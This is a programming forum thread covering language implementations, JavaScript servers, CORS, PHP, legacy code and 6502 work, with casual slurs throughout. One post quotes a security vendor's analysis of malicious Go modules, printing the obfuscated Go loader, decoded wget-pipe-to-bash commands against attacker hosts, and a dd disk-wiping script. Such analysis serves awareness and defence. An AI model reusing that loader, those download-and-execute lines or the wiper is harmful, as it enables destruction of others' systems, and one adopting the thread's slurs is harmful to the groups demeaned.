Programming thread

A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
This feels like a really bonkers claim.

Suppose C++ (or insert your favorite modern lang) had only one complete implementation (similar to how rust only has one—the official). Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using? Having multiple complete implementations is always a good thing, but this is really arbitrary as the sort of metric you're proposing. If I wrote my own gay-ass borrow checker and shit, it wouldn't make rust any more or less worth using—it's still trash.
 
Why do people use Javascript for server side stuff. Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to setup a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work then they can find someone who understands this shit.
 
Why do people use Javascript for server side stuff. Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to setup a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work then they can find someone who understands this shit.
im no genius but id assume it has something to do with everything looking like a nail. like for example, lets say youre a back end web dev who knows a lot of php. if php was able to do fromt end development (idk if it can ive never used php) chances are if you wanted more work you'd use it instead of learning something new wouldnt you?
 
Suppose C++ (or insert your favorite modern lang) had only one complete implementation (similar to how rust only has one—the official). Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?
Because then you'd be stuck with the quirks of whatever that one implementation does, which ossify into a sort of informal standard regardless of what the actual language standards (if they even exist) say. Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like retards.

I mean, look at Internet Explorer 6 and HTML/CSS for an example of "one implementation" going off the rails.
Arguably, the woeful state of Microsoft's C/C++ standards conformance is also due to their pseudo-monopoly on compilers for Windows. And it does make C++ that much less worth using.
 
Late night...staring at the screen. I give up...big bloated ancient system dating back to the early 2000s if not earlier. A succession of hapless men adding layer upon layer on top of the growing pile. Its now a veritable monstrosity of countless variables and functions twisting around each other across countless files and subfolders. It was so bad for awhile I was looking into automated solutions to try to figure out the file tree structure. I estimate maybe 90% of the code no longer serves any function but just runs or doesn't anyway doing who knows what. The perils of earlier authors trying to design a system to 'do it all'. It wasn't my fault but I was trapped by this decision. Years ago I made an abortive attempt to separate out the project from the mountain of unused junk but it didn't work out. Still not sure if I broke anything in the process. I hope not.

I've sure added to the mountain myself. Years of back and forth requirements adding functionality and removing it and adding it again and changing it. And people forgetting they asked for it to be put in then asked for it to be removed and asking to add it again. Things get left switched around or remain in place even after they are dropped in case someone decides they need it again. Subsystems pile on to other forgotten subsystems.

Its gotten so sprawling even the debugger nopes out. I can no longer follow it anymore even though I designed the last few layers myself and probably understand the system better than almost anyone else.

Gonna have to burn it down. Take it apart piece by piece and reassemble it.

I've been putting this day off for a long time. Dreading it to the point where I almost felt unwell at random instances in a restaurant or whatever when it would come to mind. Part of me just wants to just wash my hands of it and move on. Theres technically nothing compelling me to look into this again. Its so complicated and obscure I could just toss the whole thing aside and its highly unlikely anyone would ever notice...At least until they come up with an army of super powered AI bots to vet all the code on the internet. Part of me doesn't want to do it because I'm scared of what I might find. That one or several values somewhere in the labyrinth got tripped up here or there and its been spitting out incorrect information for months or years or maybe decades. The other part of me is just so burnt out on the whole thing.

Ah well...back to work I guess.
 
IDK, what do you think happens if you build up a binary pattern signature database for 20 years and never remove anything?
From what I've heard it was due to the language used early on by multiple pieces of malware, and thus the heuristics of the compilers being thrown into AV databases. Though it's still retarded
 
im no genius but id assume it has something to do with everything looking like a nail. like for example, lets say youre a back end web dev who knows a lot of php. if php was able to do fromt end development (idk if it can ive never used php) chances are if you wanted more work you'd use it instead of learning something new wouldnt you?
I agree, it's just convenience or laziness or both. The logic is "hey, I know JS, I can write backend code in JS, guess I'll go with JS on the backend too."

PHP not that bad, especially for server side rendering

I've experience with PHP. It's pretty straightforward and quite nice despite all of the negative publicity, which was due to some of the old school security issues that have been patched. I use it for server side rendering for pages where JS fetch & render is too slow (or too late in page rendering process). For instance, for SEO purposes, I will use PHP to write some of the dynamic metadata of a templated HTML page so I can have dynamically generated pages be indexed by search engines. When I do JS fetch & render, it's too slow (or late) and my pages don't get indexed.

Php has nice integration with Apache Web Server as well, making deployments clean.
 
  • Thunk-Provoking
Reactions: y a t s
Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like retards.
If this were actually true, we wouldn't still be in compatibility hell with compiled langs.

Arguably, the woeful state of Microsoft's C/C++ standards conformance is also due to their pseudo-monopoly on compilers for Windows. And it does make C++ that much less worth using.
Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?
The overall reading comprehension ability in this thread is taking a sharp decline.
 
Why do people use Javascript for server side stuff. Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to setup a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work then they can find someone who understands this shit.
If everything is written in one language, you'll have an easier time maintaining and expanding the codebase later, because future developers won't need to know multiple languages. This is especially a benefit in JS because it's a very common language. I'd say you get type transparency between modules, but in practice, all this really means is native ingestion of JSON on both ends, which isn't all that special anymore.

Also, the CORS thing is a requirement for asynchronously calling an API from the browser. It has nothing to do with the server-side language at all, and a backend in any language has to deal with it. I've dealt with it in Python and Java too; it has nothing to do with NodeJS.

[...] I use it for server side rendering for pages where JS fetch & render is too slow (or too late in page rendering process). For instance, for SEO purposes [...]
This is a solved problem in the world of JS in the form of SSR, but I can certainly understand a preference not to hitch your wagon to any particular JS framework, as they're extremely heavy, committal, and fickle in the sense that future updates will invalidate your codebase in at most 5 years.
 
Last edited:
  • Thunk-Provoking
Reactions: y a t s
Also, the CORS thing is a requirement for asynchronously calling an API from the browser. It has nothing to do with the server-side language at all
That's what all the docs tell me, but this is a server side component that was failing. If I used https://api/.... broken, if I added https://api to the local proxy and then used http://localhost/proxy/api then it worked. Maybe some weird glitch in one of the 2000 node packages this thing pulled in.

I guess I should be fair, at least people who 'program' JavaScript will never try and screw up any useful code.

Worst
Language
Ever*

* Except for every other language.
 
wget to Wipeout: Malicious Go Modules Fetch Destructive Payload

In April 2025, we detected an attack involving three malicious Go modules which employ similar obfuscation techniques:

Despite appearing legitimate, these modules contained highly obfuscated code designed to fetch and execute remote payloads. Socket’s scanners flagged the suspicious behaviors, leading us to a deeper investigation.

Unlike centralized package managers such as npm or PyPI, the Go ecosystem's decentralized nature where modules are directly imported from GitHub repositories creates substantial confusion. Developers often encounter multiple similarly named modules with entirely different maintainers, as shown below. This ambiguity makes it exceptionally challenging to identify legitimate packages from malicious impostors, even when packages aren't strictly "typosquatted." Attackers exploit this confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood developers inadvertently integrate destructive code into their projects.
Searching for packages on https://pkg.go.dev can yield a minefield of random forks and shit. You can usually tell which are the main ones based on the "Imported by" count, but you could easily fake that by creating a shitload of dummy repos that import your malicious package. tbh I find most of the go packages I use from their github links in google/bing/wtf search results. Not sure what the best solution to this issue is, given the decentralized design of go's packaging system.

Attackers cleverly masked their intent through array-based string obfuscation and dynamic payload execution—a method we previously explored in our "Obfuscation 101" blog. Here’s how one malicious module (truthfulpharm/prototransform) executed this trick:
C-like:
func eGtROk() error {
    DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
    pBRPhsxN := runtime.GOOS == "linux"
    bcbGOM := "/bin/sh"
    vpqIU := "-c"
    PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
    if pBRPhsxN {
        exec.Command(bcbGOM, vpqIU, PWcf).Start()
    }

    return nil
}

var GEeEQNj = eGtROk()

Note: The payload specifically targets Linux systems, checking the OS before execution, ensuring that the attack impacts primarily Linux-based servers or developer environments.

Decoded Malicious Commands:
Bash:
# prototransform module payload
wget -O - <https://vanartest>[.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - <https://kaspamirror>[.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - <http://147.45.44>[.]41/storage/de373d0df/ccd7b46d | /bin/sh &

Decoded Intent:
  • Fetches a destructive shell script (done.sh) from the attacker-controlled URL:
    • https://vanartest[.]website/storage/de373d0df/a31546bf
  • Executes it immediately, leaving virtually no time for response or recovery.

Similar URLs extracted from the other malicious modules (now offline):
  • https://kaspamirror[.]icu/storage/de373d0df/a31546bf
  • http://147.45.44[.]41/storage/de373d0df/ccd7b46d

Upon executing the payload retrieved from one of these URLs, we discovered a devastating shell script:

done.sh – The destructive payload:
Bash:
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync
Obviously, any programmer worth his salt would see a function like that, do a 360, and find a different library, but they're relying on the fact hardly anyone reads the source of everything they import. The dd command would need root to overwrite the device like that, but it's not all that unlikely given the widespread use of go-based stuff on servers. Though you don't get the same sort of damage if you're running through docker or similar. I'm not super worried by this, but I thought it was interesting nonetheless.
 
Last edited:
amen to that. Since i started using C and now most recently Java i feel id appreciate a like a language with the readability of python and the rigid syntax rules of C
When C's syntax is so rigid that it allows for uncountably infinite variations of undefined behaviour.
A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
GCC and LLVM are only separate because RMS is too fat and retarded to check his email. LLVM was offered to be donated to the GNU project, directly to RMS, but he simply didn't see the email. The differences between the compilers these days are pretty small, the same people work on both and port every new optimisation to both compilers.
 
Last edited:
I enjoy me some 6502 action. Unrolling loops to make things run smoothly is fun. I'm far from a real programmer tho.
recently i've taken the black man's approach of using a high level language for a 6502 machine
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos despite the fact that it doesn't really optimize the code that much
 
recently i've taken the black man's approach of using a high level language for a 6502 machine
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos despite the fact that it doesn't really optimize the code that much
That's actually very interesting and one can always inline asm stuff that really matters anyways, I'll have to try it out, cheers.
 
  • Agree
Reactions: GhastlyGhost
recently i've taken the black man's approach of using a high level language for a 6502 machine
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos despite the fact that it doesn't really optimize the code that much
The 6502 is markedly better for using HLLs on than its contemporaries like the 8080/Z80. 6502 ASM has often been compared to writing microcode directly due to it being so minimal to the point where the majority of programmers essentially build their own ad-hoc register file in the zero page.

This flexibility made it quite nice for building byte-code systems which is why Logo and Pascal were so readily available for it. Wozniak famously built a simulated 16-bit virtual machine for the 6502 called SWEET16
 
Back